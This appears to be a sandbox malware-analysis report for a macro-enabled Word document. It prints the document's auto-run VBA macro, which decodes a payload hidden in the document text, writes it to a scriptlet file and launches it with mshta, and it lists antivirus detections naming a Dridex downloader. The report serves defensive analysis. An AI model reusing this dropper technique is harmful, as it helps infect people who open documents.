popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_Open()

        ChOMhhQWXN = ""
        
        Set VuMoqPDUWBbF = CreateObject("Scripting.FileSystemObject")
        wkyKWSIdtBQkZUwSvZl = Environ("ALLUSERSPROFILE") & "\bRNuYmzFVtUBAreUdKS.sct"
        
        Open wkyKWSIdtBQkZUwSvZl For Output As #1
        For Each rrqtYdDjYG In ActiveDocument.Paragraphs
            ibOmQJdmayTAeNMZ = rrqtYdDjYG.Range.Text
            If Len(ibOmQJdmayTAeNMZ) > 10000 Then
                miMXoCBHAp = Split(ibOmQJdmayTAeNMZ, "tJOWBksDjhoM")
                For Each CwxFKPLNHbS In miMXoCBHAp
                    ChOMhhQWXN = ChOMhhQWXN + Chr(Round(CInt(CwxFKPLNHbS)))
                Next CwxFKPLNHbS
            
            Print #1, ChOMhhQWXN
            
            Exit For
            End If
           
        Next rrqtYdDjYG
        
        Close #1


        RjtuDCcnZCy = ""


        For Each mVhgYBZmTW In Array(77, 83, 72, 84, 65, 32)
            RjtuDCcnZCy = RjtuDCcnZCy + Chr(Round(CInt(mVhgYBZmTW)))
        Next mVhgYBZmTW
        EiFKNFOVqF = RjtuDCcnZCy & wkyKWSIdtBQkZUwSvZl
        With CreateObject("Wscript.Shell")
            .Exec (EiFKNFOVqF)
        End With
        
End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_Open()

        ChOMhhQWXN = ""
        
        Set VuMoqPDUWBbF = CreateObject("Scripting.FileSystemObject")
        wkyKWSIdtBQkZUwSvZl = Environ("ALLUSERSPROFILE") & "\bRNuYmzFVtUBAreUdKS.sct"
        
        Open wkyKWSIdtBQkZUwSvZl For Output As #1
        For Each rrqtYdDjYG In ActiveDocument.Paragraphs
            ibOmQJdmayTAeNMZ = rrqtYdDjYG.Range.Text
            If Len(ibOmQJdmayTAeNMZ) > 10000 Then
                miMXoCBHAp = Split(ibOmQJdmayTAeNMZ, "tJOWBksDjhoM")
                For Each CwxFKPLNHbS In miMXoCBHAp
                    ChOMhhQWXN = ChOMhhQWXN + Chr(Round(CInt(CwxFKPLNHbS)))
                Next CwxFKPLNHbS
            
            Print #1, ChOMhhQWXN
            
            Exit For
            End If
           
        Next rrqtYdDjYG
        
        Close #1


        RjtuDCcnZCy = ""


        For Each mVhgYBZmTW In Array(77, 83, 72, 84, 65, 32)
            RjtuDCcnZCy = RjtuDCcnZCy + Chr(Round(CInt(mVhgYBZmTW)))
        Next mVhgYBZmTW
        EiFKNFOVqF = RjtuDCcnZCy & wkyKWSIdtBQkZUwSvZl
        With CreateObject("Wscript.Shell")
            .Exec (EiFKNFOVqF)
        End With
        
End Sub
[Content_Types].xml
_rels/.rels
A$>"f3
word/_rels/document.xml.rels
-|d[0a
V~j08b
word/document.xml
DjQ/*E
miq 8!
xyrvxy
~8?}p%
ki'*m
+Q?mde
oN<KH}
3t3;X^
olYk}8
SmHo1#4
!- lpru,%i#
"Y'[NVC
=k[m75
word/vbaProject.bin
V^-3As
mn7d.a{
BaM+ff
pb,zpjKd&F
8$SNd'
'$+~Iz
word/_rels/vbaProject.bin.relsl
1tiJGI
word/theme/theme1.xml
w toc'v
3Vq%'#q
:\TZaG
IqbJ#x
T[XF64
word/vbaData.xml
word/settings.xml
fg,uXz
docProps/app.xml
word/styles.xml
sn=xr/a
1*k*eR
AJ==yc
docProps/core.xml
word/fontTable.xml
word/webSettings.xml
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/vbaProject.binPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan VBA.Heur2.Dridex.2.B976E273.Gen
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
Trustlook Clean
BitDefender VBA.Heur2.Dridex.2.B976E273.Gen
K7GW Clean
K7AntiVirus Clean
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
Tencent Clean
Ad-Aware VBA.Heur2.Dridex.2.B976E273.Gen
TACHYON Suspicious/WOX.Obfus.Gen.8
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.lc
FireEye VBA.Heur2.Dridex.2.B976E273.Gen
Emsisoft VBA.Heur2.Dridex.2.B976E273.Gen (B)
SentinelOne Static AI - Malicious OPENXML
GData VBA.Heur2.Dridex.2.B976E273.Gen
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Avast-Mobile Clean
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=83)
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
Panda Clean
Qihoo-360 virus.office.qexvmc.1070
No IRMA results available.